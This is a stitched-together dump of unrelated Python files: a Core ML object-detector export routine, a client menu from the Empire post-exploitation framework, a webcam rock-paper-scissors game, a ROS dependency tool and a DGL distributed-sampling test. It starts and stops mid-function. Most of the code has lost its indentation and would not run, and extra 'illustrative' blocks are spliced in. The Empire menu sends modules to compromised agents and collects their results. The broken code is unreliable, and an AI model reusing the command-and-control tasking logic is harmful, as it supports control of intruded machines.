builder.add_elementwise(name=prefix + 'wh_pre',
mode='MULTIPLY',
input_names=[prefix + 'c_anchors', prefix + 'rel_wh'],
output_name=prefix + 'wh_pre')
# (1, 2, B*H*W, 1)
builder.add_reshape(name=prefix + 'wh',
target_shape=[1, 2, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'wh_pre',
output_name=prefix + 'wh')
# (1, 4, B*H*W, 1)
builder.add_elementwise(name=prefix + 'boxes_out_transposed',
mode='CONCAT',
input_names=[prefix + 'xy', prefix + 'wh'],
output_name=prefix + 'boxes_out_transposed')
# (1, B*H*W, 4, 1)
builder.add_permute(name=prefix + 'boxes_out',
dim=[0, 2, 1, 3],
input_name=prefix + 'boxes_out_transposed',
output_name=prefix + 'boxes_out')
scale = _np.zeros((num_bounding_boxes, 4, 1))
scale[:, 0::2] = 1.0 / self._grid_shape[1]
scale[:, 1::2] = 1.0 / self._grid_shape[0]
# (1, B*H*W, 4, 1)
builder.add_scale(name=COORDINATES_STR,
W=scale,
b=0,
has_bias=False,
shape_scale=(num_bounding_boxes, 4, 1),
input_name=prefix + 'boxes_out',
output_name=COORDINATES_STR)
# CLASS PROBABILITIES AND OBJECT CONFIDENCE
# (1, C, B, H*W)
builder.add_slice(name=prefix + 'scores_sp',
axis='channel',
start_index=5,
end_index=preds_per_box,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'scores_sp')
# (1, C, B, H*W)
builder.add_softmax(name=prefix + 'probs_sp',
input_name=prefix + 'scores_sp',
output_name=prefix + 'probs_sp')
# (1, 1, B, H*W)
builder.add_slice(name=prefix + 'logit_conf_sp',
axis='channel',
start_index=4,
end_index=5,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'logit_conf_sp')
# (1, 1, B, H*W)
builder.add_activation(name=prefix + 'conf_sp',
non_linearity='SIGMOID',
input_name=prefix + 'logit_conf_sp',
output_name=prefix + 'conf_sp')
# (1, C, B, H*W)
if num_classes > 1:
conf = prefix + 'conf_tiled_sp'
builder.add_elementwise(name=prefix + 'conf_tiled_sp',
mode='CONCAT',
input_names=[prefix+'conf_sp']*num_classes,
output_name=conf)
else:
conf = prefix + 'conf_sp'
# (1, C, B, H*W)
builder.add_elementwise(name=prefix + 'confprobs_sp',
mode='MULTIPLY',
input_names=[conf, prefix + 'probs_sp'],
output_name=prefix + 'confprobs_sp')
# (1, C, B*H*W, 1)
builder.add_reshape(name=prefix + 'confprobs_transposed',
target_shape=[1, num_classes, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'confprobs_sp',
output_name=prefix + 'confprobs_transposed')
# (1, B*H*W, C, 1)
builder.add_permute(name=CONFIDENCE_STR,
dim=[0, 2, 1, 3],
input_name=prefix + 'confprobs_transposed',
output_name=CONFIDENCE_STR)
_mxnet_converter._set_input_output_layers(
builder, input_names, output_names)
builder.set_input(input_names, input_dims)
builder.set_output(output_names, output_dims)
builder.set_pre_processing_parameters(image_input_names=self.feature)
model = builder.spec
if include_non_maximum_suppression:
# Non-Maximum Suppression is a post-processing algorithm
# responsible for merging all detections that belong to the
# same object.
# Core ML schematic
# +------------------------------------+
# | Pipeline |
# | |
# | +------------+ +-------------+ |
# | | Neural | | Non-maximum | |
# | | network +---> suppression +-----> confidences
# Image +----> | | | |
# | | +---> +-----> coordinates
# | | | | | |
# Optional inputs: | +------------+ +-^---^-------+ |
# | | | |
# IOU threshold +-----------------------+ | |
# | | |
# Confidence threshold +---------------------------+ |
# +------------------------------------+
model_neural_network = model.neuralNetwork
model.specificationVersion = 3
model.pipeline.ParseFromString(b'')
model.pipeline.models.add()
model.pipeline.models[0].neuralNetwork.ParseFromString(b'')
model.pipeline.models.add()
model.pipeline.models[1].nonMaximumSuppression.ParseFromString(b'')
# begin: Neural network model
nn_model = model.pipeline.models[0]
nn_model.description.ParseFromString(b'')
input_image = model.description.input[0]
input_image.type.imageType.width = self.input_image_shape[1]
input_image.type.imageType.height = self.input_image_shape[2]
nn_model.description.input.add()
nn_model.description.input[0].ParseFromString(
input_image.SerializeToString())
for i in range(2):
del model.description.output[i].type.multiArrayType.shape[:]
names = ["raw_confidence", "raw_coordinates"]
bounds = [self.num_classes, 4]
for i in range(2):
output_i = model.description.output[i]
output_i.name = names[i]
for j in range(2):
ma_type = output_i.type.multiArrayType
ma_type.shapeRange.sizeRanges.add()
ma_type.shapeRange.sizeRanges[j].lowerBound = (
bounds[i] if j == 1 else 0)
ma_type.shapeRange.sizeRanges[j].upperBound = (
bounds[i] if j == 1 else -1)
nn_model.description.output.add()
nn_model.description.output[i].ParseFromString(
output_i.SerializeToString())
ma_type = nn_model.description.output[i].type.multiArrayType
ma_type.shape.append(num_bounding_boxes)
ma_type.shape.append(bounds[i])
# Think more about this line
nn_model.neuralNetwork.ParseFromString(
model_neural_network.SerializeToString())
nn_model.specificationVersion = model.specificationVersion
# end: Neural network model
# begin: Non maximum suppression model
nms_model = model.pipeline.models[1]
nms_model_nonMaxSup = nms_model.nonMaximumSuppression
for i in range(2):
output_i = model.description.output[i]
nms_model.description.input.add()
nms_model.description.input[i].ParseFromString(
output_i.SerializeToString())
nms_model.description.output.add()
nms_model.description.output[i].ParseFromString(
output_i.SerializeToString())
nms_model.description.output[i].name = (
'confidence' if i==0 else 'coordinates')
nms_model_nonMaxSup.iouThreshold = iou_threshold
nms_model_nonMaxSup.confidenceThreshold = confidence_threshold
nms_model_nonMaxSup.confidenceInputFeatureName = 'raw_confidence'
nms_model_nonMaxSup.coordinatesInputFeatureName = 'raw_coordinates'
nms_model_nonMaxSup.confidenceOutputFeatureName = 'confidence'
nms_model_nonMaxSup.coordinatesOutputFeatureName = 'coordinates'
nms_model.specificationVersion = model.specificationVersion
nms_model_nonMaxSup.stringClassLabels.vector.extend(self.classes)
for i in range(2):
nms_model.description.input[i].ParseFromString(
nn_model.description.output[i].SerializeToString()
)
if include_non_maximum_suppression:
# Iou Threshold
IOU_THRESHOLD_STRING = 'iouThreshold'
model.description.input.add()
model.description.input[1].type.doubleType.ParseFromString(b'')
model.description.input[1].name = IOU_THRESHOLD_STRING
nms_model.description.input.add()
nms_model.description.input[2].ParseFromString(
model.description.input[1].SerializeToString()
)
nms_model_nonMaxSup.iouThresholdInputFeatureName = IOU_THRESHOLD_STRING
# Confidence Threshold
CONFIDENCE_THRESHOLD_STRING = 'confidenceThreshold'
model.description.input.add()
model.description.input[2].type.doubleType.ParseFromString(b'')
model.description.input[2].name = CONFIDENCE_THRESHOLD_STRING
nms_model.description.input.add()
nms_model.description.input[3].ParseFromString(
model.description.input[2].SerializeToString())
nms_model_nonMaxSup.confidenceThresholdInputFeatureName = \
CONFIDENCE_THRESHOLD_STRING
# end: Non maximum suppression model
model.description.output[0].name = 'confidence'
model.description.output[1].name = 'coordinates'
iouThresholdString = '(optional) IOU Threshold override (default: {})'
confidenceThresholdString = ('(optional)' +
' Confidence Threshold override (default: {})')
model_type = 'object detector (%s)' % self.model
if include_non_maximum_suppression:
model_type += ' with non-maximum suppression'
model.description.metadata.shortDescription = \
_coreml_utils._mlmodel_short_description(model_type)
model.description.input[0].shortDescription = 'Input image'
if include_non_maximum_suppression:
iouThresholdString = '(optional) IOU Threshold override (default: {})'
model.description.input[1].shortDescription = \
iouThresholdString.format(iou_threshold)
confidenceThresholdString = ('(optional)' +
' Confidence Threshold override (default: {})')
model.description.input[2].shortDescription = \
confidenceThresholdString.format(confidence_threshold)
model.description.output[0].shortDescription = \
u'Boxes \xd7 Class confidence (see user-defined metadata "classes")'
model.description.output[1].shortDescription = \
u'Boxes \xd7 [x, y, width, height] (relative to image size)'
version = ObjectDetector._PYTHON_OBJECT_DETECTOR_VERSION
partial_user_defined_metadata = {
'model': self.model,
'max_iterations': str(self.max_iterations),
'training_iterations': str(self.training_iterations),
'include_non_maximum_suppression': str(
include_non_maximum_suppression),
'non_maximum_suppression_threshold': str(
iou_threshold),
'confidence_threshold': str(confidence_threshold),
'iou_threshold': str(iou_threshold),
'feature': self.feature,
'annotations': self.annotations,
'classes': ','.join(self.classes)
}
user_defined_metadata = _coreml_utils._get_model_metadata(
self.__class__.__name__,
partial_user_defined_metadata,
version)
model.description.metadata.userDefined.update(user_defined_metadata)
return model
def export_coreml(self, filename,
include_non_maximum_suppression = True,
iou_threshold = None,
confidence_threshold = None):
"""
Save the model in Core ML format. The Core ML model takes an image of
fixed size as input and produces two output arrays: `confidence` and
`coordinates`.
The first one, `confidence` is an `N`-by-`C` array, where `N` is the
number of instances predicted and `C` is the number of classes. The
number `N` is fixed and will include many low-confidence predictions.
The instances are not sorted by confidence, so the first one will
generally not have the highest confidence (unlike in `predict`). Also
unlike the `predict` function, the instances have not undergone
what is called `non-maximum suppression`, which means there could be
several instances close in location and size that have all discovered
        the same object instance. Confidences do not need to sum to 1 over the
        classes; any remaining probability is the implied confidence that no
        object instance is present at all at the given coordinates. The classes
appear in the array alphabetically sorted.
The second array `coordinates` is of size `N`-by-4, where the first
dimension `N` again represents instances and corresponds to the
`confidence` array. The second dimension represents `x`, `y`, `width`,
`height`, in that order. The values are represented in relative
coordinates, so (0.5, 0.5) represents the center of the image and (1,
        1) the bottom right corner. To get pixel coordinates similar to
        `predict`, multiply the relative values by the original image size
        (its size before being resized to the fixed input size).
See Also
--------
save
Parameters
----------
filename : string
The path of the file where we want to save the Core ML model.
include_non_maximum_suppression : bool
Non-maximum suppression is only available in iOS 12+.
A boolean parameter to indicate whether the Core ML model should be
saved with built-in non-maximum suppression or not.
This parameter is set to True by default.
iou_threshold : float
Threshold value for non-maximum suppression. Non-maximum suppression
prevents multiple bounding boxes appearing over a single object.
This threshold, set between 0 and 1, controls how aggressive this
            suppression is. A value of 1 means no suppression will
occur, while a value of 0 will maximally suppress neighboring
boxes around a prediction.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
Examples
--------
>>> model.export_coreml('detector.mlmodel')
"""
from coremltools.models.utils import save_spec as _save_spec
model = self._create_coreml_model(include_non_maximum_suppression=include_non_maximum_suppression,
iou_threshold=iou_threshold, confidence_threshold=confidence_threshold)
_save_spec(model, filename)
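# --- Illustrative addition (not part of the original module) -----------------
# The docstring above notes that the exported model reports boxes as relative
# [x, y, width, height] values that must be multiplied by the original image
# size. A minimal sketch of that conversion; the names are hypothetical.
def relative_box_to_pixels(box, image_width, image_height):
    """Convert a relative [x, y, width, height] box to pixel units."""
    x, y, w, h = box
    return [x * image_width, y * image_height, w * image_width, h * image_height]
# Example: a box centered in a 640x480 image covering half of each dimension:
# relative_box_to_pixels([0.5, 0.5, 0.5, 0.5], 640, 480) -> [320.0, 240.0, 320.0, 240.0]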
|
UseModuleMenu.py
|
import threading
import time
from prompt_toolkit.completion import Completion
from empire.client.src.EmpireCliState import state
from empire.client.src.menus.UseMenu import UseMenu
from empire.client.src.utils import print_util
from empire.client.src.utils.autocomplete_util import filtered_search_list, position_util
from empire.client.src.utils.cli_util import register_cli_commands, command
@register_cli_commands
class UseModuleMenu(UseMenu):
def __init__(self):
super().__init__(display_name='usemodule', selected='', record=None, record_options=None)
self.stop_threads = False
def autocomplete(self):
return self._cmd_registry + super().autocomplete()
def get_completions(self, document, complete_event, cmd_line, word_before_cursor):
if cmd_line[0] == 'usemodule' and position_util(cmd_line, 2, word_before_cursor):
for module in filtered_search_list(word_before_cursor, state.modules.keys()):
yield Completion(module, start_position=-len(word_before_cursor))
else:
yield from super().get_completions(document, complete_event, cmd_line, word_before_cursor)
def on_enter(self, **kwargs) -> bool:
if 'selected' not in kwargs:
return False
else:
state.get_bypasses()
self.use(kwargs['selected'])
self.stop_threads = False
if 'agent' in kwargs and 'Agent' in self.record_options:
self.set('Agent', kwargs['agent'])
self.info()
self.options()
state.get_credentials()
return True
def on_leave(self):
self.stop_threads = True
def use(self, module: str) -> None:
"""
Use the selected module
Usage: use <module>
"""
if module in state.modules.keys():
self.selected = module
self.record = state.modules[module]
self.record_options = state.modules[module]['options']
@command
def execute(self):
"""
Execute the selected module
Usage: execute
"""
post_body = {}
for key, value in self.record_options.items():
post_body[key] = self.record_options[key]['Value']
response = state.execute_module(self.selected, post_body)
if 'success' in response.keys():
print(print_util.color(
'[*] Tasked ' + self.record_options['Agent']['Value'] + ' to run Task ' + str(response['taskID'])))
shell_return = threading.Thread(target=self.tasking_id_returns, args=[response['taskID']])
shell_return.daemon = True
shell_return.start()
elif 'error' in response.keys():
if response['error'].startswith('[!]'):
msg = response['error']
else:
msg = f"[!] Error: {response['error']}"
print(print_util.color(msg))
@command
def generate(self):
"""
        Generate the selected module (alias for execute)
Usage: generate
"""
self.execute()
def tasking_id_returns(self, task_id: int):
"""
Polls for the tasks that have been queued.
Once found, will remove from the cache and display.
"""
count = 0
result = None
while result is None and count < 30 and not self.stop_threads:
# this may not work 100% of the time since there is a mix of agent session_id and names still.
result = state.cached_agent_results.get(self.record_options['Agent']['Value'], {}).get(task_id)
count += 1
time.sleep(1)
if result:
del state.cached_agent_results.get(self.record_options['Agent']['Value'], {})[task_id]
print(print_util.color(result))
use_module_menu = UseModuleMenu()
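# --- Illustrative addition (not part of the original menu) -------------------
# tasking_id_returns() above polls the shared result cache roughly once per
# second for up to 30 attempts. The standalone sketch below isolates the same
# poll-with-timeout pattern; `fetch` is any zero-argument callable that returns
# None until a result is available (hypothetical helper, not used by the menu).
def poll_for_result(fetch, attempts=30, interval=1.0, should_stop=lambda: False):
    """Return the first non-None value from fetch(), or None on timeout/stop."""
    for _ in range(attempts):
        if should_stop():
            return None
        result = fetch()
        if result is not None:
            return result
        time.sleep(interval)
    return None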
|
check.py
|
from random import randint
from PIL import Image
from threading import Thread
import tensorflow as tf
import numpy as np
import time
import cv2
import voicetest
pHand = []
def camcheck():
# Connect to camera
camera = cv2.VideoCapture(0)
# Take picture
time.sleep(0.2)
return_value, image = camera.read()
# Convert to Pillow-usable format
cv2im = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
pilim = Image.fromarray(cv2im)
pilim.show()
# Disconnect from camera
    camera.release()
# Convert to Tensorflow-usable format
bmp = pilim.convert('L').resize([60, 60])
hand = np.asarray(bmp).flatten().tolist()
pHand.append(hand)
ch_np = np.matrix(pHand).astype(np.float32)
return ch_np
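# --- Illustrative addition (not part of the original script) -----------------
# camcheck() above grabs a webcam frame and flattens it into the 60x60
# grayscale vector the classifier expects. The helper below applies the same
# preprocessing to an image file on disk, which is handy for testing without a
# camera; the path argument is hypothetical.
def image_to_vector(path):
    """Return a 1x3600 float32 matrix for a single image file."""
    bmp = Image.open(path).convert('L').resize([60, 60])
    hand = np.asarray(bmp).flatten().tolist()
    return np.matrix([hand]).astype(np.float32)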
def check():
# Intro music
bass_thread = Thread(target=voicetest.bass)
mel_thread = Thread(target=voicetest.melody)
bass_thread.start()
mel_thread.start()
time.sleep(7)
# Import data
check_img = camcheck()
real_hand = 0
cpu_hand = randint(1, 3)
if cpu_hand == 1:
rock = Image.open("Hands/Test/Rock/WIN_20171206_18_56_57_Pro.jpg")
rock.show()
elif cpu_hand == 2:
paper = Image.open("Hands/Test/Paper/WIN_20171206_19_15_36_Pro.jpg")
paper.show()
else:
scissors = Image.open("Hands/Test/Scissors/WIN_20171206_18_44_51_Pro.jpg")
scissors.show()
# Recreate model
x = tf.placeholder(tf.float32, [None, 3600])
w = tf.Variable(tf.zeros([3600, 3]), name='w')
b = tf.Variable(tf.zeros([3]), name='b')
y = tf.matmul(x, w) + b
# Initialize saver
saver = tf.train.Saver()
# Check image(s)
with tf.Session() as sess:
        saver.restore(sess, r'model\my_training-1100') # TODO Mod source file for previous file changes in handparser.py
sr = sess.run(y, feed_dict={x: check_img})
prediction = (sess.run(tf.argmax(sr, 1)))
if prediction[0] == 0:
real_hand = 1
elif prediction[0] == 1:
real_hand = 2
else:
real_hand = 3
print(real_hand)
print(cpu_hand)
def hand_name():
if real_hand == 1:
return "ROCK"
elif real_hand == 2:
return "PAPER"
else:
return "SCISSORS"
def roshanbo():
if real_hand == 1 and cpu_hand == 2:
voicetest.lose()
print("PAPER BEATS ROCK ... I WIN")
elif real_hand == 1 and cpu_hand == 3:
voicetest.win()
print("ROCK BEATS SCISSORS ... YOU WIN")
elif real_hand == 2 and cpu_hand == 1:
voicetest.win()
print("PAPER BEATS ROCK ... YOU WIN")
elif real_hand == 2 and cpu_hand == 3:
voicetest.lose()
print("SCISSORS BEATS PAPER ... I WIN")
elif real_hand == 3 and cpu_hand == 1:
voicetest.lose()
print("ROCK BEATS SCISSORS ... I WIN")
elif real_hand == 3 and cpu_hand == 2:
voicetest.win()
print("SCISSORS BEATS PAPER ... YOU WIN")
else:
voicetest.what()
print("A %s TIE" % hand_name())
roshanbo()
if __name__ == '__main__':
check()
|
rosdistro.py
|
import copy
import os
import sys
import tarfile
import tempfile
import threading
import urllib
import yaml
try:
from urllib.request import urlopen
from urllib.error import HTTPError
except ImportError:
from urllib2 import urlopen
from urllib2 import HTTPError
from .common import info
from .common import warning
from .common import error
RES_DICT = {'build': [], 'buildtool': [], 'test': [], 'run': []}
RES_TREE = {'build': {}, 'buildtool': {}, 'test': {}, 'run': {}}
CACHE_VERSION = 1
walks = {
'FULL_WALK': {'build': ['build', 'run', 'buildtool', 'test'],
'run': ['build', 'run', 'buildtool', 'test'],
'buildtool': ['build', 'run', 'buildtool', 'test'],
'test': ['build', 'run', 'buildtool', 'test']},
'SPIRAL_OF_DOOM': {'build': ['run'],
'run': ['buildtool'],
'buildtool': ['test'],
'test': ['build']}
}
def invert_dict(d):
inverted = {}
    for key, value in d.items():
for v in value:
v_keys = inverted.setdefault(v, [])
if key not in v_keys:
v_keys.append(key)
return inverted
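# Illustrative note (not part of the original module): invert_dict() turns a
# mapping of key -> list of values into value -> list of keys, e.g.
#   invert_dict({'build': ['catkin'], 'run': ['catkin', 'roscpp']})
#   == {'catkin': ['build', 'run'], 'roscpp': ['run']}
# get_depends_on() below uses this to walk the dependency graph in reverse.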
class RosDistro:
def __init__(self, name, cache_location=None):
self.depends_on1_cache = copy.deepcopy(RES_TREE)
t1 = threading.Thread(target=self._construct_rosdistro_file, args=(name,))
t2 = threading.Thread(target=self._construct_rosdistro_dependencies, args=(name, cache_location,))
t1.start()
t2.start()
t1.join()
t2.join()
def _construct_rosdistro_file(self, name):
self.distro_file = RosDistroFile(name)
def _construct_rosdistro_dependencies(self, name, cache_location):
self.depends_file = RosDependencies(name, cache_location)
def get_repositories(self):
return self.distro_file.repositories
def get_repository(self, repo):
return self.get_repositories()[repo]
def get_packages(self):
return self.distro_file.packages
def get_package(self, pkg):
return self.get_packages()[pkg]
def get_rosinstall(self, items, version='last_release', source='vcs'):
rosinstall = ""
for p in self._convert_to_pkg_list(items):
rosinstall += p.get_rosinstall(version, source, self.distro_file.name)
return rosinstall
def _get_depends_on1(self, package_name):
if package_name in self.depends_on1_cache:
return self.depends_on1_cache[package_name]
res = copy.deepcopy(RES_DICT)
for pkg in self.get_packages():
            for key, depends in self._get_depends1(pkg).items():
if package_name in depends:
res[key].append(pkg)
self.depends_on1_cache[package_name] = res
return res
def get_depends_on1(self, items):
return self.get_depends_on(items, 1)
def get_depends_on(self, items, depth=0, dep_dict=walks['FULL_WALK']):
res = copy.deepcopy(RES_DICT)
for p in self._convert_to_pkg_list(items):
            for dep_type, dep_list in res.items():
self._get_depends_on_recursive(p.name, dep_type, invert_dict(dep_dict), dep_list, depth, 1)
return res
def _get_depends_on_recursive(self, package_name, dep_type, dep_dict, res, depth, curr_depth):
deps_on = self._get_depends_on1(package_name)
# merge and recurse
for d in deps_on[dep_type]:
if not d in res:
res.append(d)
if depth == 0 or curr_depth < depth:
for next_dep_type in dep_dict[dep_type]:
self._get_depends_on_recursive(d, next_dep_type, dep_dict, res, depth, curr_depth+1)
def _get_depends1(self, package_name):
p = self.distro_file.packages[package_name]
return self.depends_file.get_dependencies(p, self.distro_file.name)
def get_depends1(self, items):
return self.get_depends(items, 1)
def get_depends(self, items, depth=0, dep_dict=walks['FULL_WALK']):
res = copy.deepcopy(RES_DICT)
for p in self._convert_to_pkg_list(items):
            for dep_type, dep_list in res.items():
self._get_depends_recursive(p.name, dep_type, dep_dict, dep_list, depth, 1)
return res
def _get_depends_recursive(self, package_name, dep_type, dep_dict, res, depth, curr_depth):
deps1 = self._get_depends1(package_name)
# merge and recurse
for d in deps1[dep_type]:
if not d in res:
res.append(d)
if depth == 0 or curr_depth < depth:
if d in self.get_packages(): # recurse on packages only
for next_dep_type in dep_dict[dep_type]:
self._get_depends_recursive(d, next_dep_type, dep_dict, res, depth, curr_depth+1)
def _convert_to_pkg_list(self, items):
if type(items) != list:
items = [items]
pkgs = []
for i in items:
if i in self.distro_file.repositories:
for p in self.distro_file.repositories[i].packages:
if not p in pkgs:
pkgs.append(p)
elif i in self.distro_file.packages:
if not self.distro_file.packages[i] in pkgs:
pkgs.append(self.distro_file.packages[i])
else:
raise RuntimeError("!!! {0} is not a package name nor a repository name".format(i))
return pkgs
class RosDistroFile:
def __init__(self, name):
self.packages = {}
self.repositories = {}
self.name = name
# parse ros distro file
distro_url = urlopen('https://raw.github.com/ros/rosdistro/master/releases/%s.yaml' % name)
        distro = yaml.safe_load(distro_url.read())['repositories']
# loop over all repo's
        for repo_name, data in distro.items():
repo = RosRepository(repo_name, data['version'], data['url'])
self.repositories[repo_name] = repo
            if 'packages' not in data: # support unary distros
data['packages'] = {repo_name: ''}
# loop over all packages
for pkg_name in data['packages'].keys():
pkg = RosPackage(pkg_name, repo)
repo.packages.append(pkg)
self.packages[pkg_name] = pkg
class RosRepository:
def __init__(self, name, version, url):
self.name = name
self.version = version
self.url = url
self.packages = []
def get_rosinstall(self, version, source):
return "\n".join([p.get_rosinstall(version, source) for p in self.packages])
class RosPackage:
def __init__(self, name, repository):
self.name = name
self.repository = repository
self._package_xmls = {}
self._release_tags = {}
def _fetch_package_xml(self, rosdistro):
repo = self.repository
if 'github.com' in repo.url:
url = repo.url
upstream_version = repo.version.split('-')[0]
release_tag = 'release/{0}/{1}'.format(self.name, upstream_version)
url = url.replace('.git', '/{0}/package.xml'.format(release_tag))
url = url.replace('git://', 'https://')
url = url.replace('https://', 'https://raw.')
try:
try:
package_xml = urlopen(url).read()
except Exception as e:
msg = "Failed to read package.xml file from url '{0}': {1}".format(url, e)
warning(msg)
url = repo.url
release_tag = 'release/{0}/{1}/{2}'.format(rosdistro, self.name, repo.version)
tail = '/{0}/package.xml'.format(release_tag)
url = url.replace('.git', tail)
url = url.replace('git://', 'https://')
url = url.replace('https://', 'https://raw.')
info("Trying to read from url '{0}' instead".format(url))
package_xml = urlopen(url).read()
except Exception as e:
msg += '\nAND\n'
msg += "Failed to read package.xml file from url '{0}': {1}".format(url, e)
raise RuntimeError(msg)
self._package_xmls[rosdistro] = package_xml
self._release_tags[rosdistro] = release_tag
return package_xml, release_tag
else:
raise Exception("Non-github repositories are net yet supported by the rosdistro tool")
def get_package_xml(self, rosdistro):
if rosdistro not in self._package_xmls:
self._fetch_package_xml(rosdistro)
return self._package_xmls[rosdistro]
def get_release_tag(self, rosdistro):
if rosdistro not in self._release_tags:
self._fetch_package_xml(rosdistro)
return self._release_tags[rosdistro]
def get_rosinstall(self, version, source, rosdistro):
# can't get last release of unreleased repository
if version == 'last_release' and not self.repository.version:
raise RuntimeError("Can't get the last release of unreleased repository {0}".format(self.repository.name))
# set specific version of last release of needed
if version == 'last_release':
version = self.repository.version.split('-')[0]
# generate the rosinstall file
release_tag = self.get_release_tag(rosdistro)
if version == 'master':
return yaml.dump([{
'git': {
'local-name': self.name,
'uri': self.repository.url,
'version': '/'.join(release_tag.split('/')[:-1])
}}],
default_style=False)
else:
if source == 'vcs':
return yaml.safe_dump([{
'git': {
'local-name': self.name,
'uri': self.repository.url,
'version': release_tag
}}],
default_style=False)
elif source == 'tar':
uri = self.repository.url
uri = uri.replace('git://', 'https://')
uri = uri.replace('.git', '/archive/{0}.tar.gz'.format(release_tag))
return yaml.safe_dump([{
'tar': {
'local-name': self.name,
'uri': uri,
'version': '{0}-release-{1}'.format(self.repository.name, release_tag.replace('/', '-'))
}}],
default_style=False)
else:
raise RuntimeError("Invalid source type {0}".format(source))
class RosDependencies:
def __init__(self, name, cache_location):
# url's
self.file_name = '%s-dependencies.yaml' % name
if cache_location:
self.local_url = os.path.join(cache_location, self.file_name)
else:
from rospkg import environment
self.local_url = os.path.join(environment.get_ros_home(), self.file_name)
self.server_url = 'http://www.ros.org/rosdistro/%s-dependencies.tar.gz' % name
self.dependencies = {}
# initialize with the local or server cache
deps = self._read_local_cache()
if deps == {}:
deps = self._read_server_cache()
        for key, value in deps.items():
self.dependencies[key] = value
if self.cache == 'server':
self._write_local_cache()
def get_dependencies(self, package, rosdistro):
repo = package.repository
# support unreleased stacks
if not repo.version:
return copy.deepcopy(RES_DICT)
key = '%s?%s?%s' % (repo.name, repo.version, package.name)
# check in memory first
if key in self.dependencies:
return self.dependencies[key]
# read server cache if needed
if self.cache != 'server':
deps = self._read_server_cache()
            for key, value in deps.items():
self.dependencies[key] = value
self._write_local_cache()
if key in self.dependencies:
return self.dependencies[key]
# retrieve dependencies
deps = retrieve_dependencies(package.get_package_xml(rosdistro))
self.dependencies[key] = deps
self._write_local_cache()
return deps
def _read_server_cache(self):
self.cache = 'server'
try:
resp = urlopen(self.server_url)
except HTTPError as ex:
warning("Failed to read server cache: %s" % ex)
return {}
        with tempfile.NamedTemporaryFile('wb') as fh:
fh.write(resp.read())
fh.flush()
tar = tarfile.open(fh.name, 'r')
data = tar.extractfile(self.file_name)
            deps = yaml.safe_load(data.read())
if not deps \
or not 'cache_version' in deps \
or deps['cache_version'] != CACHE_VERSION \
or not 'repositories' in deps:
                raise RuntimeError('invalid dependency cache downloaded from %s' % self.server_url)
return deps['repositories']
def _read_local_cache(self):
try:
self.cache = 'local'
with open(self.local_url) as f:
deps = yaml.safe_load(f.read())
if not deps \
or not 'cache_version' in deps \
or deps['cache_version'] != CACHE_VERSION \
or not 'repositories' in deps:
raise
return deps['repositories']
except Exception:
return {}
def _write_local_cache(self):
try:
try:
os.makedirs(os.path.dirname(self.local_url))
except:
pass
with open(self.local_url, 'w') as f:
yaml.dump({'cache_version': CACHE_VERSION,
'repositories': self.dependencies},
f)
except Exception as ex:
error("Failed to write local dependency cache to %s: %s" % (self.local_url, ex))
def retrieve_dependencies(package_xml):
try:
return get_package_dependencies(package_xml)
except Exception:
raise RuntimeError("Failed to get dependencies from package_xml:\n```\n{0}\n```".format(package_xml))
def get_package_dependencies(package_xml):
if not os.path.abspath("/usr/lib/pymodules/python2.7") in sys.path:
sys.path.append("/usr/lib/pymodules/python2.7")
from catkin_pkg import package as catkin_pkg
pkg = catkin_pkg.parse_package_string(package_xml)
depends1 = {'build': [d.name for d in pkg.build_depends],
'buildtool': [d.name for d in pkg.buildtool_depends],
'test': [d.name for d in pkg.test_depends],
'run': [d.name for d in pkg.run_depends]}
return depends1
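# --- Illustrative usage sketch (not part of the original module) -------------
# A minimal example of how this module is typically driven; the distro and
# package names are hypothetical and network access is required.
if __name__ == '__main__':
    distro = RosDistro('groovy')
    print(distro.get_depends('roscpp', depth=1)['build'])
    print(distro.get_rosinstall('roscpp', version='last_release', source='vcs'))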
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.distributed import sample_neighbors
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name):
import dgl
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, graph_name,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
import dgl
gpb = None
if disable_shared_mem:
_, _, _, gpb = load_partition(tmpdir / 'test_sampling.json', rank)
dist_graph = DistGraph("rpc_ip_config.txt", "test_sampling", gpb=gpb)
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
dgl.distributed.shutdown_servers()
dgl.distributed.finalize_client()
return sampled_graph
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling():
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
